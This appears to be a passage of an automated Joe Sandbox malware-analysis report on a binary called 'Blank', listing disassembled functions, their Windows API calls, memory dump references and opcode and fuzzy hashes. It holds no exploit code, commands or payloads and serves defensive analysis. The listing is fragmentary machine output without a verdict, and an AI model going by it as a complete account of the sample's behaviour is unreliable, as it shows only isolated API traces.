                                                                                                                                    • Opcode ID: d43ed37ad8f1ed68cea5b90741eaefb72e7303eec245e10fd1a17568e74a4e16
                                                                                                                                    • Instruction ID: 2ba26fe828d2a0ba8f5705e62d5569e76a0894ebc92f47b9df5d4408aa11836f
                                                                                                                                    • Opcode Fuzzy Hash: d43ed37ad8f1ed68cea5b90741eaefb72e7303eec245e10fd1a17568e74a4e16
                                                                                                                                    • Instruction Fuzzy Hash: 7231F630924B479BDB318F64DC49BB677E8AB01B40F2400A9E412972D1D7F598E5E721
                                                                                                                                    Function 002B95D7 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 002B95E8
                                                                                                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 002B9692
                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 002B969A
                                                                                                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 002B96A8
                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 002B96B0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3382505437-0
                                                                                                                                    • Opcode ID: 95af1da0167b620a8f74e6908405b82530f007744f470459d3841687a8cd67ba
                                                                                                                                    • Instruction ID: 3372f3eea2c683de2ef2e5431d10206d0cd9cd2ed9540f12200a765bd1b6a133
                                                                                                                                    • Opcode Fuzzy Hash: 95af1da0167b620a8f74e6908405b82530f007744f470459d3841687a8cd67ba
                                                                                                                                    • Instruction Fuzzy Hash: 7631BF71900219EFDB14CF68DD8CAEE3BB9EB44365F104229FA24E61D1C3B09964DB90
                                                                                                                                    Function 002BBD85 Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • IsWindowVisible.USER32(?), ref: 002BBD9D
                                                                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 002BBDBA
                                                                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 002BBDF2
                                                                                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 002BBE18
                                                                                                                                    • _wcsstr.LIBCMT ref: 002BBE22
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3902887630-0
                                                                                                                                    • Opcode ID: a6844b57750628d9370ee063ab6df4f3e709f1141f156c242cb9362980afb49b
                                                                                                                                    • Instruction ID: 62efcb7cc22144a8900295ec0157fe6b2f962ead4bda3f1121e160bde0b9a15f
                                                                                                                                    • Opcode Fuzzy Hash: a6844b57750628d9370ee063ab6df4f3e709f1141f156c242cb9362980afb49b
                                                                                                                                    • Instruction Fuzzy Hash: B121DA31215105BAEB265F359C49EFF7B9CDF497A0F104029FD09DA1A1DBA1DC60D760
                                                                                                                                    Function 002EB7BD Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002629E2: GetWindowLongW.USER32(?,000000EB), ref: 002629F3
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 002EB804
                                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 002EB829
                                                                                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 002EB841
                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 002EB86A
                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,002D155C,00000000), ref: 002EB888
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Long$MetricsSystem
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2294984445-0
                                                                                                                                    • Opcode ID: 4a0f713eea75a03e17a16893454c300d1dd44d64d3e5e764ede87ef6ec52e2dc
                                                                                                                                    • Instruction ID: 3674e41d22a3e98dede07d1353a6a90c6ccffc0b8075661f079e2672408bb278
                                                                                                                                    • Opcode Fuzzy Hash: 4a0f713eea75a03e17a16893454c300d1dd44d64d3e5e764ede87ef6ec52e2dc
                                                                                                                                    • Instruction Fuzzy Hash: 7C219631964156AFCB119F399C48A6A7758FB05775F504738F925D66E0D7708820CB80
                                                                                                                                    Function 002B9EBF Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 002B9ED8
                                                                                                                                      • Part of subcall function 00271821: _memmove.LIBCMT ref: 0027185B
                                                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 002B9F0A
                                                                                                                                    • __itow.LIBCMT ref: 002B9F22
                                                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 002B9F4A
                                                                                                                                    • __itow.LIBCMT ref: 002B9F5B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$__itow$_memmove
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2983881199-0
                                                                                                                                    • Opcode ID: aaef410c8c2cafe1c7ae3a20302c1931a9ae3f90779ebbb827780bc4a4623bf1
                                                                                                                                    • Instruction ID: 4f4cca2aa6118667fd5f5f7de00fe426fe1ce0b89e6a33edd7c3952c2f30af3a
                                                                                                                                    • Opcode Fuzzy Hash: aaef410c8c2cafe1c7ae3a20302c1931a9ae3f90779ebbb827780bc4a4623bf1
                                                                                                                                    • Instruction Fuzzy Hash: 7A21B631611205ABDB10AF648C89EFE7BACEF857A0F144025FA05D7181E670D9A19BD1
                                                                                                                                    Function 002D6138 Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • IsWindow.USER32(00000000), ref: 002D6159
                                                                                                                                    • GetForegroundWindow.USER32 ref: 002D6170
                                                                                                                                    • GetDC.USER32(00000000), ref: 002D61AC
                                                                                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 002D61B8
                                                                                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 002D61F3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4156661090-0
                                                                                                                                    • Opcode ID: e820b4e60ba274e2339611bf3a328ac93c58bc650a712efe8839e04d66aaa137
                                                                                                                                    • Instruction ID: 6c50a74d2f2af868db45c1cf64094d15a2375112dde96bd403cd9e5f5847daf3
                                                                                                                                    • Opcode Fuzzy Hash: e820b4e60ba274e2339611bf3a328ac93c58bc650a712efe8839e04d66aaa137
                                                                                                                                    • Instruction Fuzzy Hash: 7A215E75A10204AFD714EF65DD88AAABBF9EF88351F048479E94AD7352CA30ED50CB90
                                                                                                                                    Function 002616CF Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00261729
                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00261738
                                                                                                                                    • BeginPath.GDI32(?), ref: 0026174F
                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00261778
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3225163088-0
                                                                                                                                    • Opcode ID: 7bead525a1751196332a96dfd4a886f0254b75a8fed646e096216002520b1aed
                                                                                                                                    • Instruction ID: e9a5ce15806f24bf012f31901b7383bd8b272fc0d701dc39a20c899bd3254e29
                                                                                                                                    • Opcode Fuzzy Hash: 7bead525a1751196332a96dfd4a886f0254b75a8fed646e096216002520b1aed
                                                                                                                                    • Instruction Fuzzy Hash: 0621C834824209EFDB229F25ED4E7A97BADFB00361F18421DF815961A0D771A8F2CF90
                                                                                                                                    Function 002BC837 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memcmp
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2931989736-0
                                                                                                                                    • Opcode ID: f5f6333aae248b3694bf2e9c59402cb4f6d1d8823927fcd4a328fae95b7fe1d3
                                                                                                                                    • Instruction ID: 8c3fa229f7c5ef8cb60cfa38fab5684d64c4489549b79529f26ddbd7b91b9a81
                                                                                                                                    • Opcode Fuzzy Hash: f5f6333aae248b3694bf2e9c59402cb4f6d1d8823927fcd4a328fae95b7fe1d3
                                                                                                                                    • Instruction Fuzzy Hash: 02019262B3111A7BD215A5119C82FFBB35CAE613C4B244036FF0696782F7A1DE3286E0
                                                                                                                                    Function 002C504E Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 002C5075
                                                                                                                                    • __beginthreadex.LIBCMT ref: 002C5093
                                                                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 002C50A8
                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 002C50BE
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 002C50C5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3824534824-0
                                                                                                                                    • Opcode ID: 80ec9c39d1ce0959d53440aad8f907246ec15ce0df233aabb058e273d9bf4b27
                                                                                                                                    • Instruction ID: 23cd326dd3fd13e61cfa2219993052eb950bb09f7a657a2785bc982f1e59d949
                                                                                                                                    • Opcode Fuzzy Hash: 80ec9c39d1ce0959d53440aad8f907246ec15ce0df233aabb058e273d9bf4b27
                                                                                                                                    • Instruction Fuzzy Hash: 59114872918719BBC7119FA8AC48FAB7BACAB45320F10036DF814D3391D271D95087F0
                                                                                                                                    Function 002B8E20 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002B8E3C
                                                                                                                                    • GetLastError.KERNEL32(?,002B8900,?,?,?), ref: 002B8E46
                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,002B8900,?,?,?), ref: 002B8E55
                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,002B8900,?,?,?), ref: 002B8E5C
                                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002B8E73
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 842720411-0
                                                                                                                                    • Opcode ID: b45e563bcea5d13368a130ac1fcb73832498a389780c308398355a9e16507f4f
                                                                                                                                    • Instruction ID: 43c2bc54783510a18af50df3be282dd7f0da2b0e01ecc9e5fe75b4ded30b2747
                                                                                                                                    • Opcode Fuzzy Hash: b45e563bcea5d13368a130ac1fcb73832498a389780c308398355a9e16507f4f
                                                                                                                                    • Instruction Fuzzy Hash: F80136B5611205BFDB104FA5EC8CDBB7FADEF857A57100569F949C2110DB31EC10CA60
                                                                                                                                    Function 002C57FF Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002C581B
                                                                                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 002C5829
                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 002C5831
                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 002C583B
                                                                                                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002C5877
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2833360925-0
                                                                                                                                    • Opcode ID: c8ba67fa78047ec549ab1c022686c520e0f4db545af6d26e2da4863d7fb125df
                                                                                                                                    • Instruction ID: e3ed335f1f61159963488a606d083aa83671db276e13f4da58c0135ec880cb01
                                                                                                                                    • Opcode Fuzzy Hash: c8ba67fa78047ec549ab1c022686c520e0f4db545af6d26e2da4863d7fb125df
                                                                                                                                    • Instruction Fuzzy Hash: F2015E31C11A2DDBDF009FE8EC8CAEEBBB8BB08751F404259E405B2141CB30E5A0CBA1
                                                                                                                                    Function 002B7D28 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002B7C62,80070057,?,?,?,002B8073), ref: 002B7D45
                                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002B7C62,80070057,?,?), ref: 002B7D60
                                                                                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002B7C62,80070057,?,?), ref: 002B7D6E
                                                                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002B7C62,80070057,?), ref: 002B7D7E
                                                                                                                                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002B7C62,80070057,?,?), ref: 002B7D8A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3897988419-0
                                                                                                                                    • Opcode ID: 039f4c11b807decef59165d5962eb8ad0ff79b496a43c3e5151d3223664cf4a4
                                                                                                                                    • Instruction ID: acf9dc2ac947581fe3daa3c6591331af914f81563a35f1f55e31f6ffdbad8f97
                                                                                                                                    • Opcode Fuzzy Hash: 039f4c11b807decef59165d5962eb8ad0ff79b496a43c3e5151d3223664cf4a4
                                                                                                                                    • Instruction Fuzzy Hash: 35017C72625216ABDB114F54EC88BBA7BADEF847E2F144024F909D6215D771EE10CBA0
                                                                                                                                    Function 002B8CC7 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002B8CDE
                                                                                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002B8CE8
                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002B8CF7
                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002B8CFE
                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002B8D14
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 44706859-0
                                                                                                                                    • Opcode ID: f16b48f50e38d25121ad7ef0018b26e3f9a41b1489e9e23fbe4aa109f8fcb46a
                                                                                                                                    • Instruction ID: 122d644d67bce44137d00f14b3e7e11d0f45b9c554085fdf253d1069a171edfb
                                                                                                                                    • Opcode Fuzzy Hash: f16b48f50e38d25121ad7ef0018b26e3f9a41b1489e9e23fbe4aa109f8fcb46a
                                                                                                                                    • Instruction Fuzzy Hash: 45F0A43021020AAFDB100FF4ECCCEB73B6CEF497A4B10402AF548C2190CA60AC50DB60
                                                                                                                                    Function 002B8D28 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 002B8D3F
                                                                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 002B8D49
                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002B8D58
                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 002B8D5F
                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002B8D75
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
